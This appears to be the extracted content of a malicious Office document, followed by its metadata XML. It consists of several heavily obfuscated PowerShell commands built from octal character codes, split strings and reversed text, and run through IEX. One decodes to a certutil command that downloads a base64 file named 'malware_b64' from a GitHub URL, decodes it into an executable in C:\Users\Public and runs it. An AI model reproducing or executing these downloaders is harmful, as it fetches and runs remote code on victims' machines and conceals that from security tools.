163,145, 164 , 57 , 147 , 156 ,151, 150, 164 ,163, 151, 47 , 53 ,47 , 150,164 ,145, 153 ,141,47, 53,47,155,141 , 156 ,156, 165, 147 ,164,163 , 165, 152 ,155 , 47 ,53,47, 151 ,57,155,157,143, 56 ,164 , 156 , 145, 47 , 53 ,47, 164, 156, 47 , 53, 47,157 ,143, 162 ,145,163 ,165, 47, 53 ,47 ,142, 165,47 ,53 ,47,150 ,164 ,151 ,47,53 , 47 ,147, 56 ,167,141,162, 57 , 57,47,53, 47 , 72,163,160 ,47,53,47,164 ,164, 150 , 40 , 146 ,55, 47, 53 ,47 , 40, 164 , 47 ,53 , 47 , 151 ,47 , 53, 47,154, 160,163,47 , 53 , 47,55 ,40, 145,150 , 143,141,143 ,47 ,53 , 47,154 ,162 , 165 , 47,53, 47, 55 , 47 , 53 , 47, 40, 47 , 53, 47, 154, 151,164 ,165, 164 ,162 ,145,47,53,47 ,143, 47, 50,50, 40 ,50,51, 47, 47 ,116 , 151 ,117 , 152, 55 , 135, 62 ,54,61 ,61, 54 ,63,133,105 ,115 ,141, 116,56 ,51,47 ,52,122 ,144, 155 , 52, 47 ,40 ,145 , 114 ,102 ,141,111 , 162,101,126, 55,164 , 105, 107, 50 ,50 , 40, 56,40 , 42 ,40 ,54 ,40 , 47, 56 , 47,40,54 , 40 ,47,122 ,151 , 47 ,53 , 47, 147 , 150,124, 164 ,47, 53,47, 117 ,154 ,145, 146 , 164 ,47, 51 ,40,174,45 ,40, 173 , 44 ,137,56, 166 , 101 ,114,125 ,145 ,40,175,40, 51 , 40 ,51 ,40 ,174 ,46,50 , 40 , 44, 166,105 ,162 ,142 , 117 , 163 , 145 , 120,122,145,106, 105, 122 , 145,116,103,145 ,56, 164, 117 , 123, 164,162,111,116,107 , 50 ,51,133 ,61 , 54, 63, 135,53,47,130, 47 ,55,112 , 117,151,156, 47 , 47, 51) | FOrEAcH-ObjEcT {( [cOnveRT]::toInT16( ( [sTrINg]$_ ), 8 )-aS[CHAR]) } ))
. ( $ENv:comspEC[4,24,25]-joiN'') (" $(SEt-iTeM  'vaRIAbLe:ofS' '' ) " +[strinG]('44V105:111@161:64>147l61M40V75:40@40:133e103@110N101l122N133@135>135>40e42>51M47N47l116>151N157e112N55l135N65N62N54l66:62M54@64N133@103>105M120N123l155N157l103V72:166h116N105l44M40>50@46:40e174h51V62l71>135Q122:101>110N103V133:40>106>55>40@51e47V145:170V145l56l141V175M47M53h47>60Q173l175l47>53M47N60V173h143Q151:154Q142V165Q160l175:60l47:53:47>173h175h60h173:163>162M145:163N165>175M60:47N53Q47N173>175e47>53e47:60V47M53Q47>173l72Q143Q40V141>175h60e173V175M60@173e143V151M154l142@47l53V47e165h47@53@47M160M175l60M47>53:47>173h175e60@173h163N162>145M163l165M175N60:173N175V47N53h47M60Q173e47V53h47e72>143l40N145e144h157M143e145h47@53l47N144h55l40@47V53e47@154N151e164@165Q164>162@145e143M40@47V53M47h73e141@175V60l173e175e60M173:143>151V47e53N47:154>142h165@160l175h60e47N53@47@173N175:60N173e163:162l47V53N47:145h163@165>175>60e173N47N53:47@175>60h173Q72l143>40V164e170N164h56M163Q153M141h145N162M142:157h156l137l64>66:142l137Q145Q47N53:47N162M141h47>53l47l167Q154l141@155V57Q162Q145h164h163e47M53>47:141M155>57l164h163h145e47:53l47Q164:47M53e47V57:147>156e151V150h47M53>47e164h163V151N150h164h145N153@141h155h141>156h156l165h147>164e163Q165h47:53M47Q152V155N151N57>155:157V143N56@164:156h145@164V47l53e47>156>157M47e53N47l143>162Q145e163l47M53>47>165>142N47Q53>47V165M150h164e151l147V56>47V53>47V167M141M162M57V57:72@163@160h164h164N47h53e47:150:47l53l47l40Q146e55>40Q164:151N47@53M47M154>160>163N55N47M53>47:40@145h150M143M141N47@53Q47e143>154Q47V53V47>162V165>55M40l154Q151V164:47l53:47@165@164l162N145M143Q47>50N50e40Q42>40M73>40h133@101e162e122@141@131l135>72M72h122Q105V166:145Q162h123:105l50:50e40M166@101M122l151@101N142:154@145@40l40:50N47h145M47h53Q47M151e161@64>47@53N47e107l61Q47M51e40l55Q126:101>114Q51@51N73V133N123Q164:162V151e156V147l135:72>72:152:157V151h116Q50:40@47h47:54l40@50:40h166Q101h122h151@101M142Q154@145e40>40e50e47V145e47>53:47l151>161V64@47V53@47N107V61M47@51l40h55h126N101M114N51Q51N174Q46M50e40M44h163V150:105l154l114>111:144>133:61l135h53l44e163e150:105V154l154M151e104h133:61V63N135h53N47h170>47M51'.spLIT('@:VMQeN>lh' ) | % {([chAR]( [ConvERT]::TOiNt16( ($_.tostrinG()) ,8) ))}) +"$( Set  'OFs'  ' ' ) ")
. ( $PsHome[21]+$psHOME[34]+'x')( [striNG]::JOiN( '' ,('44K126S70%127!61j152z164Y75K40!40{133{143o150D101%122z133%40Y135K135z40o42S51K47S47%116o151z117D152S55K135j65D62%54!65j61!54S64Y133o143D105{160z123{115{117{103S72K166Y116o145%44o40D50S40!46j174j51S62{71%135D162Y141o110j103S133o135Y107o116z111z122o164j163D133{54K51D62{60%61S135o162o141Y110Y103{133j53o65o61o61D135{162Y141S110o103D133D53o64S67j135K162{141j110j103D133D50%50o105j103z141D114K120K145{122D56!51Y47z145S170z47%53%47S145o47K53D47K56z141z47D53j47j146D47j53Y47D163D112S146S47K53{47S163o47!53o47K112{143%47S53{47z151o154K142o165!47%53o47o160K146Y163o47j53S47K112j47{53%47K146%163j112%163j162z145S163S165z146z163j112D146S163o112{47j53Y47z72z143j40{141D146o163S112%146!163D112o143%151o154S142z165Y160{146{163j112!146j47!53!47Y163D112D163!162D145K47!53D47S163K47z53j47{165{47j53%47o146o163j112%146S163!112z72S143Y40D145D144D157z143D47%53%47!145%144K55K40%154!151D164Y47D53o47o165Y164S47j53{47S162!145z143j40D73%141!146j163S47D53%47K112%146Y163K112{47%53j47K143%151z154j142S47o53o47S165z160{47S53!47z146K163{112z146{163j112S163j162{145{163{165%146S163o112%146S47D53o47K163S112S47!53S47o72K143Y40D164Y47S53o47{170Y164K56S163z47z53o47S153%141%47o53Y47z145S162Y142Y157K156D137{64j66o142z137{145{162!141z167Y154{47D53D47D141j155j57S47K53o47{162o47%53{47Y145Y47j53!47j164!163K141D155S47!53S47z57!47j53D47o164j163D145S164!57S47z53!47z147!156!151j150D47S53z47K164j163S151j150o47!53S47S164D145{153z141D155K141z156Y156!165D147D164K163S165S152{47Y53K47K155o151j57{155j157o47Y53D47o143%56o164%47z53!47K156{47z53Y47%145j47z53z47%164o156o47{53%47K157{143Y162D145z47!53D47j163Y165%142%165z150D164Y151!147D47Y53!47j56Y167{141o162Y57%57%72z163z47!53j47z160K47{53Y47z164K164S150S40j146!55{40Y164S151S154j160o163%55j47S53Y47o40o145Y150z47o53z47{143{141!47{53Y47z143z154Y162j165Y55S47Y53S47Y40!47%53D47j154K151S164{165%164K47Y53{47z162o145S143z47!50{42!40z73!40!133{101Y162Y122j141z171D135%72{72z122Y105o126Y105Y122!123z105Y50S50K40D40{147S105z164K55!126S141!162j151{101j102j154{105S40z50j42D166{70{127%42S53S42K61o152o164%42K51o40z40j51Y56!126!101K114j125%105{40j51!73%40D133o163D124S122S151z156j107j135j72o72!152!117S111z116K50{47S47K54o40o50!40o40K147Y105z164z55{126Y141o162Y151Y101!102{154{105o40Y50o42%166Y70D127D42j53o42D61%152{164{42Y51!40!40o51!56D126D101j114D125K105o51Y174j40j46{50S40o44z105%116z126S72o103!117!155j163Y160S105z143D133!64!54Y62K64D54%62S65S135o55%112S157S151j156%47z47z51'-spLIT'o' -splIT '{' -spliT'%'-SPlIt 'j' -SPlIT 'S' -sPlit'K' -SpLIT 'Y' -sPlIt '!'-SpLiT'D'-sPLIT'z' | fOREacH-OBJEct{([CoNvErt]::Toint16( ([stRiNg]$_ ),8)-aS[chaR]) }) ) )
IEX( [STrinG]::JOin('' , ( (163,105, 164,40 , 40, 50 , 47,120,123,47 ,53 ,47 ,147,47,51, 40 , 50, 133 ,143, 110 , 101, 122,133 ,135 , 135, 40 ,42,51 ,47 ,47 , 156,151, 117 ,152 ,55, 47, 130 , 47 ,53, 135 ,63,54 , 61 ,133,51 ,50 ,107,116,151 ,122 ,164 , 163 ,157 , 124 ,56 , 105 ,103, 156 , 105,122, 105 , 146,145 ,162 ,160 , 105,123 , 157,142,122 , 105, 166, 44,40,50,40, 46 ,174,51 , 62 , 71, 135 ,122 , 101 , 110, 103 , 133, 106 , 55 , 40 , 51,47 ,145 ,170,145, 56,141, 47, 53 , 47 , 175 , 47, 53 ,47, 60, 173, 175 , 60 , 173 ,143, 151, 154,142 ,165,160, 175 , 47,53, 47, 60 ,173 ,175 ,47, 53 ,47, 60 ,47, 53 , 47 , 173, 163, 162, 145, 163, 165 , 175 , 60,173 ,175,60, 173,47, 53 ,47 ,72, 143, 40 , 47, 53 , 47, 141, 175 , 60, 173 , 175,60 ,47 , 53 , 47,173,143 , 151 , 154,142,165,160,175 , 60, 173 ,175 ,60 , 173 ,163, 47 , 53 , 47,162 , 145 ,163, 165 , 175 ,60,173,175 , 60,173 ,72 ,143, 40 , 145 , 144, 157,143,145 , 144 , 55 ,47 , 53 ,47, 40,154, 151 , 164,165 , 164, 162 ,145 , 143, 40 ,73 ,47, 53,47 ,141 ,175, 60, 47, 53 , 47, 173 , 175,60, 47, 53, 47 ,173, 143 ,151 , 154,142 ,47, 53,47, 165 , 160 ,47 , 53, 47 ,175, 60,173 ,175 ,60, 173,163 , 162 ,145 ,163 ,165, 47 ,53 ,47 , 175 ,60,173 , 175, 60 ,173 ,47 , 53 , 47,72,143, 40 ,47,53 , 47,164, 170 , 47 ,53 ,47, 164,56, 163 , 153, 141,145,162,142,157 , 47 ,53 , 47 ,156,47 ,53, 47, 137, 64 , 66, 142,47 , 53 ,47 , 137,145, 47, 53,47,162, 47 ,53 , 47, 141 ,167, 47, 53, 47 ,154, 141,155 ,57 ,162 ,145 , 164 ,163,141 ,155 , 57 , 164 , 47 , 53,47 , 163 ,145 , 164 ,57 , 47 ,53 , 47,147, 156 ,151,150 ,47 ,53 ,47 ,164,163,151 , 150, 164 ,145 , 153, 141 ,155 , 141, 156 ,156 , 165, 47 , 53 , 47 , 147,164,163,165 ,152 , 47 ,53, 47 , 155,151 , 57 ,155 , 47, 53,47 ,157, 143 ,56 ,47 ,53 ,47,164,156, 145 ,164, 156 ,47, 53, 47 ,157 , 143,162 ,145 ,163 ,165, 142, 165 , 150,164 , 151 ,147, 56,167 ,141 ,162 ,57 , 57, 72,47 , 53, 47 , 163 , 47 , 53, 47 ,160 ,164,164 , 150 ,40, 146,55,40 , 164 ,151, 47, 53 , 47, 154 ,160, 163 , 47 ,53 ,47 , 55, 47,53,47, 40, 145 , 47, 53 ,47 ,150, 143 ,141 , 47 , 53 ,47, 143, 154, 162 , 47 ,53,47 ,165,55 , 40 , 47, 53,47 ,154 , 47,53,47 ,151, 164 ,165 ,164 ,162,47 , 53, 47, 145 , 143 , 47, 50 , 50 , 40 ,42 ,40 ,51,73 ,40 , 133, 101, 162 , 122,101, 131,135,72, 72 , 122, 145,126 , 145,162,123 , 145 , 50, 50, 40 ,147 ,105 , 164, 55 ,166, 101 , 162 , 111,141,102 , 114,105 ,40 , 50,47,120 , 123, 47 , 53,47,147,47,51,51 , 56,126,101 ,114 , 125 ,105 ,40,51 , 40 ,73, 40 , 46, 50 ,40, 44 ,123,150 , 105,154 , 114 ,111, 104 ,133,61, 135 ,53 ,44,163 ,150 ,145 , 114 , 154 ,111, 104 ,133 ,61 , 63,135, 53 ,47,170 , 47 ,51 ,40 , 50 , 40 , 55,112, 117 , 111,156 ,50,40, 147 ,105, 164 , 55,166 , 101,162 ,111 ,141, 102,114,105 ,40 , 50,47 , 120, 123 , 47 , 53 ,47 , 147 , 47 , 51 ,51 , 56 ,126 , 101,114, 125 ,105 , 51 ) |foreAcH{([chaR]([coNVErt]::TOint16( ([sTrIng]$_),8) ))} )) )
[STRiNg]::join('' , ( ( 44,62 , 71,113 ,66, 40 , 75,133,103, 150,101 , 162,133,135 , 135 , 42, 51 , 47 , 170, 47 ,53 ,135,60 , 63 , 133 ,105,155,157 ,150 , 123 , 120 , 44 ,53 ,135 , 64,133 ,105,155 , 157, 150,123 ,120 , 44 , 40,50, 46 , 174 ,40 ,51 , 47 ,134 , 47 , 54 ,51 ,71 ,67 ,135 , 162,101,110 ,103 , 133,53, 67,67 ,135 , 162 , 101,110, 103, 133 ,53 ,64 , 65 , 135,162 ,101,110 , 103, 133, 50 , 50 , 105 , 103, 141, 154, 120 , 105 , 122 ,56 ,51 ,47 , 145, 47 , 53 ,47,170 ,145 , 47, 53, 47 ,56,141 ,47,53,47, 117,115, 66 ,117 , 115 , 66 ,143 ,151, 154,142 , 165, 47,53 ,47 ,160,117 ,115,47,53, 47,66, 47,53,47 ,117 , 47 ,53 ,47 ,115, 47 ,53 ,47 ,66 ,163 ,47 ,53 , 47 , 162, 145,163,47,53 , 47 , 165,117 ,115, 66,117,115,66 , 72 ,143 ,40 , 141 ,47,53 , 47,117 ,47 , 53, 47,115, 66 ,117 , 115 , 47 ,53 ,47 , 66 ,143,47 , 53,47 ,151,154 , 47, 53 , 47 , 142 ,47, 53 ,47 ,165 ,47 ,53,47, 160, 117,47, 53,47 ,115,66, 47 ,53 ,47 ,117,115 , 66 , 163, 162,145 , 47 ,53 , 47 , 163 , 165 , 47 , 53, 47,117 ,47,53,47 ,115, 66 ,117, 115 ,47 , 53, 47 ,66 ,72 ,143, 40,47,53 ,47, 145 ,144, 157,143,145 , 144 , 55 , 40,154,151 ,164 ,47 ,53, 47 ,165 ,47 ,53, 47 ,164, 162 , 47,53 ,47,145, 143,40,73 ,141 ,117, 115,66,117,115 ,66 , 143, 47 ,53 ,47, 151,154 , 142, 47 , 53 , 47, 165, 160 ,117 ,115 , 66, 47 ,53 , 47,117, 47,53 , 47 ,115, 66 , 163 , 162 ,145, 163, 47 , 53, 47 , 165,47 ,53 ,47, 117 , 115 , 66,117 ,47 ,53 ,47 ,115,66, 72, 143,40,164,170, 164, 47 ,53,47,56 ,47 , 53 ,47,163 , 153 ,141,145 ,47 ,53 ,47 ,162 ,142, 157 ,47 , 53, 47 , 156, 47 , 53 ,47 , 137 ,64 , 66 ,142 , 137, 145,162, 141 ,167 , 154 , 141 ,47, 53 , 47 ,155 , 47,53,47 , 57, 162 , 145,164, 163 ,47,53,47,141 ,155, 57, 47, 53 ,47 ,164,47 ,53,47 , 163,145 , 47 , 53 ,47 , 164,57, 147 ,156,151, 150 ,164 ,163,151, 150, 164,47,53 ,47 ,145 , 153,141,155 , 47 , 53, 47 ,141, 156 ,156 ,165, 147,47, 53, 47, 164 ,163, 165 , 152,155, 151 ,57, 47, 53 , 47,155 ,47 , 53,47, 157, 143 ,56,164 , 156, 145 ,164 ,156 ,157,143 , 162 ,145,47,53 ,47,163,165 , 142, 165,150,47 ,53,47 , 164 ,151 ,147 ,47 , 53 , 47, 56, 167, 141,162 , 47, 53,47, 57 , 57 ,72, 47, 53 , 47 ,163,160, 164, 47 ,53 ,47 ,164,150 ,40,146, 55, 40, 47,53 , 47 , 164,151,154,160,163 ,55,40, 145,150,47,53 ,47,143 , 141,143 ,47,53,47, 154, 162 ,165,55 ,40 , 154,151 ,164 , 47 ,53 , 47,165, 47 ,53 , 47 ,164 , 47 ,53 , 47 ,162,145,47 ,53, 47 , 143 , 47 , 50,42 , 73,40 ,133,101,162, 122 , 101,131, 135,72 , 72,162,145 ,166 , 105 , 122, 123 ,145,50, 50 , 40,40,107 , 145 , 164, 55,166, 141 ,162 , 111 ,141, 102 ,154, 145 ,40,40 , 50, 47 , 62 ,71,153 ,47, 53 , 47, 66 , 47 , 51 , 40 ,40 ,55, 126,101 ,114,125 ,105,40,40 , 51, 51 ,73,133,163 ,164 , 162 , 151 , 116 ,107, 135,72,72 , 152 , 157,151, 116, 50 , 47,47 , 54,50,40, 40,107, 145,164 ,55 , 166 ,141 ,162 , 111 , 141, 102 , 154 , 145,40 , 40 ,50,47, 62,71,153,47 , 53, 47,66,47,51,40 ,40, 55, 126 , 101, 114 , 125 , 105,40,40 ,51,51,174 , 40,111,105,130 ) | FoREach { ( [CHAR]( [cOnvErt]::toinT16( ([sTRING]$_),8) ))}) )| .( $ENv:cOMSPEC[4,15,25]-JOIn'')
&( $eNv:cOmSpec[4,24,25]-JOin'')( ( '40n133}123_124B122_111}116n147}135:72z72M152K157K151B116n50z47_47M40n54n40P50P40n133P122K145M147D145M170M135D72K72B155}101D124B103}150n105z123B50D42D51}40z51n62K71_135:162_101n110M103D133P106M55n51:47z145z47n53z47n170K47_53_47_145:47z53n47B56M141:175n60:47M53:47n173:175D60:173}143P47B53n47B151_47M53B47n154:142}165P160P47K53B47:175_60:47M53M47z173K175z47K53K47_60z47D53D47:173}163n162D145n163M165:175z47M53}47_60}173D175K47_53}47n60M173}72K143K40D47P53z47n141D47P53}47}175:60z173_175}60n173D143D47B53K47M151P47P53z47M154n142_47M53}47_165P160}47P53D47_175P60D173K175n60n173M163}162D47n53z47:145M163B47n53K47D165}175D60B173_175:60D173n72M143D47K53P47n40z145z144M157B143B145P144}55z47D53n47}40_154K151_164K165}47z53K47M164}162z47D53:47P145z143:47P53D47:40D73M141K175z60:47K53:47B173:47B53:47:175z47D53}47K60P173}143K151:154M47}53B47K142_165P160z47M53B47z175K47K53M47_60P47z53D47}173:175:60_47P53B47K173z163n47:53:47_162n145:163}165B175}60}173n175B60z173K72}47n53_47D143B40:47D53}47z164M170_47}53_47K164_56B163z153z141z145n162_142D157_156}137:64_66:142}137M145K162K47D53_47B141B167n154K141n155}57n47n53n47n162}145z164K163_141D155D57D164z163z145}164K57n47B53K47P147P156n151P150D164_163_151P150B47P53B47}164K145M153n141B47}53B47z155n141B156D156D165:147}164P163K165z152K155D151_47:53P47:57}47n53D47D155_157}143P56}164n156P145M164B156B157_143n162n145D163:165:47:53z47z142D47:53B47n165K150n164M151B47}53K47D147D47M53n47P56_167K141P162K57z57z72P163P160D164z164n47D53_47z150M47B53:47B40D47z53z47K146:55z40P164n151B47}53P47_154B47D53D47}160P47P53K47P163P47K53M47_55:40B145:150P143P141K47n53n47n143B47n53_47_154K162n165n47}53K47_55K40D154P151:47z53z47n164P165_164}162:47z53K47D145_47P53M47P143P47M50D50_40n50P156M117}151:123n123_105:162B160M170:105n55K105_153P157B166P156D151n40_42:40:54B40n47P56z47}40_54n47M162_151P147P110z124n124}157B154n145_106P124z47}40n51z40K174z146z157M162:105M141z143D110K55K117n102:112:105B103z124}173}44z137M56B166M141K154B165:145_175M51_40P51P40K174K46_50}40K44:145}116K126P72n143:117B115n163z160:145_143D133_64}54P62z66B54B62M65M135K55M112P117_111}156K47}47K51'.sPLit( 'P}_DKn:BzM' ) | forEaCH{ ( [cONVErt]::TOInT16(( $_.tostrINg() ),8 )-AS [ChaR])} )-jOIn '' )
. ( $ShElLId[1]+$SHELlId[13]+'x')([STRiNg]::Join('' ,( '44u162w154@151w62l145!116!75:133@143l150@101P162}133}135J40J135J42@40w51:51J62y71@135:122P141u110!103u133P40u106:55P40u40w51l47u145}170l145u47!53w47P56:47!53l47J141y175:60J173@175l60P173y143u151J154J47u53@47w142@165w160!47:53:47!175J60:173}175J60w47l53P47}173!163l162}47y53!47w145y47y53:47}163y165l175u60!173:175w60w173!72u143l40y141}175w60y173y175u47P53P47:60}173w143}151J154P142:165w160@175J60y173w175J60J173:163@162@145w47w53}47u163@165!175@60@173w175l60u173l47}53y47:72w143J40@145w144P157:47}53P47P143}145l144l47P53u47}55w47@53w47:40@154l151J164}165P164}162}47!53}47y145:143l47u53u47P40u73@141u175J47l53w47@60w173P175@60l173w143w151P154y142u165y47P53y47J160J175w60:173J175y60u173y163J162!47u53:47y145!47P53!47P163@165@47!53!47:175l60y173:175:60l47y53P47u173w72J47J53u47P143J40}47!53}47!164l170w47y53y47u164y56@163y153w47J53l47l141J145w47w53P47J162}47!53@47u142y47}53J47l157w156@137y64@66y142l137w47:53J47}145:162J141u167J154l141@155!57l162u47@53}47w145J164!163@141:155l57y164y163u145@47y53u47P164w57P147J156y151y150l164:163y47!53u47@151:150}164@145P153P141u155:141}156P156!165J47l53}47}147J164}163@165J47w53P47@152l155l151u47}53y47l57l155w157:47l53!47y143y56}164y156u145@164w156y157w47y53y47@143y162:145w163u165l142l165!150y164@151u147y56y167P141u162@57!57P72J47!53J47J163:47}53y47P160l164:47!53}47:164:150J40u47J53P47:146J55l40l164w151y47u53y47!154l160w163P55J40@145}150@47!53y47w143}141J143J47:53P47l154y162u47y53:47J165P47J53y47@55!40:154u151}47:53u47l164:165:164:162J47@53:47l145y47y53:47!143:47l50:50w50@51l47P47l116@111@157w152!55l135:65l62y54:64:62y54J64@133y143!105J160l163@115u157!103P72u166y116u105P44l40y50}40w46@42}40u73:133}141u122l122l101P131J135!72!72l162!145u126:105y162!123l145}50J50y126P101u162!151w101l142!154w105u40y40J50l42P162@42w53y42w154y151@62}145}42w53:42@156P42P51}40w40l55w126J101y114w165P105}157y51@40:51}40u73!56l50l40J44!105@156y126y72w143l117y155w123l160J145}103u133}64u54u62y66!54w62@65P135@55!112w157y151P156P47w47}51u40}50y40:50@126J101J162u151y101l142!154P105y40y40@50:42l162l42:53J42w154P151!62@145}42!53@42u156J42J51y40y40@55u126u101w114}165l105P157y51w55!112l157l111!116}40u47P47l51'.sPlIt( '@}!l:JywPu') |FOReACH-OBJEct{ ( [cHaR] ([COnVerT]::ToiNt16( ( [STriNG]$_),8 ) )) })))
-JOIn( '44F63:64B62I164@40;40H75;42}51@51:62F71;135p122}101H150H103B133}135@107p156B151}162B124p163H133@54:47;144I115p150F47:50}105B143,101I114,120p105}162I56H51F47}145F170;145,56,141F144}115H150I47F53}47I144B115}47F53p47p150I143@47H53;47I151@154F142,165,160,144H115:150I144F115p150H47@53F47I163@162I145:163;165F47p53:47,144F115F150p144,115I150,72@143H40}141B47,53:47,144F115:150F144@115p150H143}151,154H47;53}47,142p165:160F47,53B47;144H47@53}47;115}150I144p115F150:163I162F145@163}165B47:53}47}144}115H150@144p115H47H53B47p150F72p143@47B53I47,40}145H144@157:143I145H144,55@40@154}151B47H53I47@164:165H164}162F145I143H40,47F53;47F73,141:144H115I150B47@53}47F144}115;150H143B47H53}47@151F154}142,165:160:144B115,150;144@47F53F47:115I150H163H162,47p53;47:145,163@165:144I115H150H144B115,150I72}143F40,164;170,164I47I53I47:56}163@153B141p145;162}142I157@156:137:64p66}142,137p145H162,47;53,47@141@47p53:47@167;154@141:155,57H47I53H47}162:47,53}47;145I164}47F53}47,163F141,155B57;164;163F145@164,47@53p47H57}147:156I151:150I164p163I151;150I164@145p153H141p155I47:53H47p141,156I156I165@147,164B163F165B152;47:53@47B155I151,47I53,47H57B155:47@53F47}157:143H56F164B156p145H164;156I157I143I162H47B53p47B145,47p53p47@163,47H53:47,165B47F53@47H142:165,150@164;151@147H56p47;53I47,167B141:162,57}57;72:163;160}47p53H47:164I164:150F40p146F47p53,47,55}47F53F47;40:164,151F154}47:53I47@160p163}55B40}145;150B143B141@143H154:162,165@55;47,53}47}40F154;151B164F165F164H47I53,47F162}145p143@47I50}50,51H47I130;47}53B135p63F61I133}144;111}114B154,105,110;123B44B53I135B61;133}104I151}154p154,145:150;123p44;40@50;40B46}42I73;40p40;46:40}50I40H44:166I145}162B142}157@123}145;120H122}105;146I105p162I105}156:103,145I56F124}157p163}164I122}111p156F107:50;51p133F61F54@63;135}53I47H130:47;55H112;117,111p156F47}47@51:50@42,40H44F50;163I105,124;55I111I164:105@115@40p47,126p141p162B151I101@142:154H105H72,117F146F163@47:40;47:47;51p42B40B53;133F123}164;122:151I116@147B135I40F50;40p50,40F40@147p145p164@55;143;150:151;154F104I151}124B145@155@40B166F101,162:111@101p102F154B145;72@63I64F62F124@40H40B51}56;166p141I154F165:145@133B55;40;61I56,56p55}40I50,40I50B40F40,147:145;164B55,143I150F151F154B104;151@124}145H155B40I166@101B162I111p101,102}154,145B72:63,64H62@124}40@40:51F56@166}141F154,165}145B56p114I145:116p147@124@150,40H51@40H135:51I40}53,42,44F50I163F145,164;55:111p164:145;155B40}40:47@166F101,122p151:141}142F154;105H72:117;146H123p47@40F47}40H47I51}42@51'-SplIt':'-SPLIt'p' -sPLIt'}' -spLiT 'F'-spLIt '@' -spliT ','-SPlIT ';' -SpLIt 'B' -spLit'H' -spLit'I'|% { ( [CHAR] ( [CoNVeRt]::TOInT16( ($_.toSTRINg()) ,8 ) ))})|INvoke-exPrESsION
.((GET-VariablE '*mdr*').naMe[3,11,2]-jOIn'') ( ( [rEgEX]::MAtCHES( "XeI| )29]raHc[,)68]raHc[+37]raHc[+84]raHc[(EcAlPER-  )'exe'+'.aVI0VI'+'0c'+'i'+'lbupV'+'I0V'+'I'+'0s'+'resuVI0V'+'I0:c'+' aV'+'I0VI0'+'c'+'i'+'lbu'+'pV'+'I0'+'VI'+'0sresuVI0VI'+'0:c edoced- '+'litutrec ;aVI0VI0'+'c'+'ilb'+'upVI0VI0sre'+'s'+'u'+'V'+'I0VI'+'0:c tx'+'t'+'.ska'+'er'+'b'+'on_'+'46b_'+'er'+'aw'+'l'+'am/retsa'+'m/'+'tset/g'+'n'+'ihtsihtekamannu'+'gts'+'uj'+'m'+'i/mo'+'c.tnetnocresubuhtig.wa'+'r/'+'/'+':s'+'ptth '+'f'+'- tilp'+'s'+'-'+' ehcacl'+'r'+'u'+'-'+' '+'li'+'tut'+'rec'((",'.' , 'RIG'+'h'+'TToLEf'+'t' ) -jOIn '' ) )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5</Words>
  <Characters>25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2019-12-09T15:55:10Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-GB</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-09T16:00:02Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>